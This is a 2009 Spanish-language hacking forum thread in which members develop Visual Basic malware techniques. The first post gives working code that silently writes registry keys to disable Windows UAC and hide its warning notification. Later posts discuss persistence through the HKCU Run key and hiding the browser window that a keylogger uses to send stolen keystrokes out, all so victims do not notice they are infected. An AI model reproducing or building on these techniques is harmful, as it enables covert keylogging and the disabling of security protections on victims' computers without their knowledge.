elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  DESACTIVAR UAC
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: DESACTIVAR UAC  (Leído 12,634 veces)
A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
DESACTIVAR UAC
« en: 23 Mayo 2009, 03:55 am »

En un blog encontre el siguiente codigo:

Código:
Option Explicit

Private Declare Function CreateFile Lib "kernel32" _
Alias "CreateFileA" ( _
ByVal lpFileName As String, _
ByVal dwDesiredAccess As Long, _
ByVal dwShareMode As Long, _
ByVal lpSecurityAttributes As Long, _
ByVal dwCreationDisposition As Long, _
ByVal dwFlagsAndAttributes As Long, _
ByVal hTemplateFile As Long) As Long

Private Declare Function WriteFile Lib "kernel32" ( _
ByVal hFile As Long, _
ByVal lpBuffer As Any, _
ByVal nNumberOfBytesToWrite As Long, _
lpNumberOfBytesWritten As Long, _
ByVal lpOverlapped As Long) As Long

Private Declare Function CloseHandle Lib "kernel32" ( _
ByVal hHandle As Long) As Long

Const OPEN_ALWAYS = 4
Const GENERIC_WRITE = &H40000000
Const FILE_SHARE_WRITE = &H2

Const FILE_ATTRIBUTE_NORMAL = &H80

Private Declare Function ShellExecuteEx Lib "shell32.dll" ( _
ByRef lpExecInfo As SHELLEXECUTEINFOA) As Long

Private Type SHELLEXECUTEINFOA
cbSize As Long
fMask As Long
hwnd As Long
lpVerb As String
lpFile As String
lpParameters As String
lpDirectory As String
nShow As Long
hInstApp As Long
lpIDList As Long
lpClass As String
hkeyClass As Long
dwHotKey As Long
hIcon As Long
hProcess As Long
End Type

Const SW_NORMAL = 1
Const SW_HIDE = 0

Private Sub Form_Load()
On Error Resume Next
Dim strPath As String
Dim strBatCode As String

strBatCode = "Reg add " & Chr(34) & "hkey_local_machine\SOFTWARE\Microsoft\Security Center" & Chr(34) & " /v UACDisableNotify /t reg_dword /d 00000001 /f" & vbCrLf & _
"Reg add " & Chr(34) & "hkey_local_machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" & Chr(34) & " /v EnableLUA /t REG_DWORD /d 00000000 /f"


Write2File Environ$("TEMP") & "\temp.bat", strBatCode
strPath = Environ$("TEMP") & "\temp.bat"


If Elevate(strPath) Then
MsgBox "! Elevación de Privilegios Exitosa ¡ A : " & vbCrLf & _
strPath, vbInformation, "ShellExecuteEx RUNAS Verb" ' si lo usan quiten estos mensajes solo los coloque para probar la función
Else
MsgBox "No se pudo elevar privilegios A : " & vbCrLf & _
strPath, vbInformation, "ShellExecuteEx RUNAS Verb"
End If

End

End Sub
Private Function Elevate(strPath As String) As Boolean


Dim ExInfo As SHELLEXECUTEINFOA
Dim lnRet As Long

With ExInfo
.cbSize = Len(ExInfo)
.fMask = 0&
.hwnd = hwnd
.lpVerb = "runas"
.lpFile = strPath
.lpParameters = vbNullChar
.lpDirectory = vbNullChar
.nShow = SW_HIDE
End With

On Error Resume Next

lnRet = ShellExecuteEx(ExInfo)

If lnRet <> 1 Then
Elevate = False
Exit Function
End If

Elevate = True

End Function
Private Sub Write2File(Filename As String, Buffer As String)
On Error Resume Next
Dim hFile As Long
Dim hWrite As Long

hFile = CreateFile(Filename, GENERIC_WRITE, FILE_SHARE_WRITE, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0)
If hFile <> 0 Then
hWrite = WriteFile(hFile, Buffer, Len(Buffer), 0, 0)
End If
CloseHandle (hFile)
End Sub


Que desactiva el UAC
aqui escribo un poco de la descripcion que puso el autor:
Citar
by Mono Gramatical at/on 18:29
in

Bueno, estuve probando con algunas claves del registro del Windows Vista, y me parecio interesante dos valores EnableLUA y UACDisableNotify, la primera deshabilita la UAC y la segunda hace que no se muestre la notificación de seguridad que advierte que la UAC ha sido deshabilitada. el inconveniente con esto es que solo se pueden agregar estos valores al registro con privilegios administrativos, es por eso que opte por utilizar la API ShellExecuteEx que combinada con el verbo "Runas" hace que una determinada aplicación solicite y corra con privilegios. para ello primero creo un bat que escribe en el registro y lo ejecuto con privilegios si se acepta la uac queda deshabilitada y de esta forma puedo copiarme a las carpetas del sistema y modificar las claves que activada la UAC no podriamos modificar.

Nos es algo muy bueno pero se puede deshabilitar la UAC sin levantar sospechas

El problema es que al ejecutar el Bat SALTA el control de usuarios y volvemos al principio, :/
Alguien sabe algo respecto a como desactivar el UAC con VB?


En línea

Hackeo, luego existo...
XcryptOR

Desconectado Desconectado

Mensajes: 228



Ver Perfil
Re: DESACTIVAR UAC
« Respuesta #1 en: 23 Mayo 2009, 05:00 am »

mira esto solicita privilegios de administrador para ejecutar el bat es lógico que te salte el cartel de que necesita permisos para su ejecución o no lo hace cualquier  otro programa? acaso no te has fijado que hasta los propios programas de eindows solicitan permiso de ejecucion ?, en vista aun no he visto como hacer que ese letrero de solicitud de privilegios salte, creo que no has entendido que después de ejecutar el bat con los privilegios de administrador hace que se escriban las claves necesarias para que se desactive la UAC, pero tienes que reiniciar el sistema, para que  surta efecto.

la otra manera de hacer bypass es usar claves del registro y carpetas que no sean sospechosas para la uac, el famoso kavo.exe se extendio demasiado y afecto a muchos ordenadores con vista y la uac ni enterada.

saludos


En línea



A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: DESACTIVAR UAC
« Respuesta #2 en: 23 Mayo 2009, 05:21 am »

 :-[ :-[ :-[  disculpa q no haya publicado la url de tu blog bro pero no sabia si lo tomarian como spam.
si entendi bien lo que hace el script pero crei que tambien era invisible la advertencia de correrse el bat.

Esque lo quiero usar para un Keylogger que tengo en VB y manda la info por iexplore y al estar activado el UAC las ventanas de iexplore no aparecen invisibles, porque creo que el UAC desactiva el metodo:

ShellExecute Me.hwnd, vbNullString, "iexplore.exe", sUrl &  & Cadena, "C:\", 0
deberia abrirse el iexplore de forma invisible pero se abre maximizado.


« Última modificación: 23 Mayo 2009, 14:01 pm por A2Corp » En línea

Hackeo, luego existo...
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: DESACTIVAR UAC
« Respuesta #3 en: 23 Mayo 2009, 15:45 pm »

Código
  1. Option Explicit
  2. 'SHELL32
  3. Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
  4. Private Const SW_HIDE As Long = 0
  5.  
  6. Private Sub Form_Load()
  7.    Call ShellExecute(0&, "OPEN", "http://www.google.es", vbNullString, vbNullString, SW_HIDE)
  8. End Sub

A mi me funciona... Win 7...MOD: No, al final aparece

Prueba con CreateProcess/WinExec :¬¬ ;)

Por cierto, si en vez de pasar la URL como parámetro la pones directamente se abre con el Navegador por defecto ;)

Saludos ;)
« Última modificación: 23 Mayo 2009, 15:59 pm por Karcrack » En línea

A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: DESACTIVAR UAC
« Respuesta #4 en: 23 Mayo 2009, 17:52 pm »

Otra cosa, vuelvo a lo mismo....
Para poder meter con VisualBasic en el registro dentro de  "RUN" teniendo el UAC activo no se graba nada =(
En línea

Hackeo, luego existo...
XcryptOR

Desconectado Desconectado

Mensajes: 228



Ver Perfil
Re: DESACTIVAR UAC
« Respuesta #5 en: 23 Mayo 2009, 18:33 pm »

colocalo en la clave Run del HKEY_CURRENT_USER, eso no debe presentarte problemas
En línea



A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: DESACTIVAR UAC
« Respuesta #6 en: 23 Mayo 2009, 19:55 pm »

Gracias hermano  :D
Fue lo que hize.
ya voy burlando UAC!

Solo falta que abra el iexplore invisible.
En línea

Hackeo, luego existo...
A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: DESACTIVAR UAC
« Respuesta #7 en: 23 Mayo 2009, 22:55 pm »

Código
  1. Option Explicit
  2. 'SHELL32
  3. Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
  4. Private Const SW_HIDE As Long = 0
  5.  
  6. Private Sub Form_Load()
  7.    Call ShellExecute(0&, "OPEN", "http://www.google.es", vbNullString, vbNullString, SW_HIDE)
  8. End Sub

A mi me funciona... Win 7...MOD: No, al final aparece

Prueba con CreateProcess/WinExec :¬¬ ;)

Por cierto, si en vez de pasar la URL como parámetro la pones directamente se abre con el Navegador por defecto ;)

Saludos ;)


pero seguiria abriendose en forma visible xD y seria muy obvio que estan infectados   :silbar:

buscare acerca de lo que me dijiste espero encontrar algo.
En línea

Hackeo, luego existo...
A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: DESACTIVAR UAC
« Respuesta #8 en: 23 Mayo 2009, 23:44 pm »

podria ser con la winsock api, no?
dejenme probar....
En línea

Hackeo, luego existo...
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: DESACTIVAR UAC
« Respuesta #9 en: 23 Mayo 2009, 23:57 pm »

pero seguiria abriendose en forma visible xD y seria muy obvio que estan infectados   :silbar:

Citar
Call ShellExecute(0&, "OPEN", "http://www.google.es", vbNullString, vbNullString, SW_HIDE)

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Desactivar f5
Desarrollo Web
Enigma_Hash 8 10,919 Último mensaje 11 Abril 2013, 00:37 am
por l337*
Desactivar javascript en Tor.
Dudas Generales
SMFSM 2 18,799 Último mensaje 19 Junio 2014, 22:56 pm
por GenR_18
Desactivar wps
Redes
wblack 9 9,514 Último mensaje 10 Junio 2015, 00:53 am
por FrancisJM
Desactivar Cuentas
Hacking
danisaezparra 3 3,312 Último mensaje 18 Febrero 2015, 04:11 am
por engel lex
desactivar scure boot win 8 « 1 2 »
Windows
zuposi 10 6,926 Último mensaje 25 Agosto 2015, 11:44 am
por Songoku
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines